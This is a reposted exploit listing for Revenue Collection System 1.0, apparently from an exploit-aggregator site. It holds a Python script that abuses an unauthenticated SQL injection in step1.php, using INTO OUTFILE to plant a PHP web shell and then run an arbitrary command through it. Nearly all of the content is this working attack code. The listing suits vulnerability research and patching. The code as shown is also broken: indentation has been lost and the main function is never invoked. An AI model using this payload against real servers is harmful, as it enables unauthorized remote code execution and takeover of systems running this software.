Revenue Collection System 1.0 SQL Injection / Remote Code Execution

CVE Category Price Severity
N/A CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Not specified Critical
Author Risk Exploitation Type Date
Unknown High Remote 2022-11-17
Our sensors found this exploit at:

Below is a copy:

Revenue Collection System 1.0 SQL Injection / Remote Code Execution
# Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection
# Exploit Author: Joe Pollock
# Date: November 16, 2022
# Vendor Homepage:
# Software Link:
# Tested on: Kali Linux, Apache, Mysql
# CVE: T.B.C
# Vendor: Kapiya
# Version: 1.0
# Exploit Description:
#   Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to 
#   write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.
#   This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.
#   Ex: python3 "ls"

import sys, requests
def main():
if len(sys.argv) != 3:
print("(+) usage: %s <target> <cmd>" % sys.argv[0])
print('(+) eg: %s "ls"'  % sys.argv[0])

targetIP = sys.argv[1]
cmd = sys.argv[2]
s = requests.Session()

# Define obscure filename and command parameter to limit exposure and usage of the RCE.
FILENAME = "youcantfindme.php"
CMDVAR = "ohno"

# Define the SQL injection string
sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)

# Write the PHP file to disk using the SQL injection vulnerability
url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)
r1 = s.get(url1)

# Execute the user defined command and display the result
url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)
r2 = s.get(url2)

if __name__ == '__main__':

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.